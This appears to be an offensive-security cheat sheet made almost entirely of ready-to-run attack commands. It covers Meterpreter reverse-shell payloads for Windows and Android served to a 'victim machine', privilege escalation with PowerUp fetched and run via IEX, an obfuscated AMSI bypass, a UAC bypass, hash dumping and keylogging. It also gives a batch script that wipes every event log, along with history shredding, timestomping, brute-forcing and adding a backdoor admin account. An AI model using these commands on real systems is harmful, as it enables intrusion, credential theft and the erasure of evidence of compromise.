msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe]msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exemkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp [PATH]/shellcode.exe /var/www/html/share
service apache2 startDownload it to the victim machine [IP Address of Host Machine]/share/shellcode.exe.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT [Port in the Host Machine]
exploit upload [PATH]/PowerUp.ps1 PowerUp.ps1shell
poweshell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecksbypass is used to bypass PowerShell’s execution policy.
For disable AMSI:
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks"Invoke-ServiceAbuse -Name 'Name of the vulnerable service'Attemp to bypass Windows UAC protection via the FodHelper Registry Key usind bypassuac_fodhelper exploit
use exploit/windows/local/bypassuac_fodhelperIf it works, in some cases we can already escalate privileges with some techniques like getsystem.
getsystem -t 1run post/windows/gather/smart_hashdumpIt uses the service Named Pipe Impersonation (In Memory/Admin) Technique.
Clear the events logs that require administrative or root privileges using Meterpreter (root requiered)
clearevfor /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul
:theEnd
ExitSecurely delete a chunk of data by overwriting it to prevent its possible recovery using in-built Windows tool (Windows)
cipher /w:[Drive or Folder or File Location] export HISTSIZE=0shred ~/.bash_historyshred ~/.bash_history && cat /dev/null > .bash_historytimestomp [FILE] -vtimestomp [FILE] -m "mm/dd/yyyy hh:mm:ss"keyscan_startkeyscan_dumphydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP]net user Test /Add
net localgroup Administrators Test /Addmsfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] R > payload.apk© 2023 javierizquierdovera.com
Licensed under the Apache License, Version 2.0 (LICENSE-APACHE) or the MIT license (LICENSE-MIT), at your option.
SPDX-License-Identifier: (Apache-2.0 OR MIT)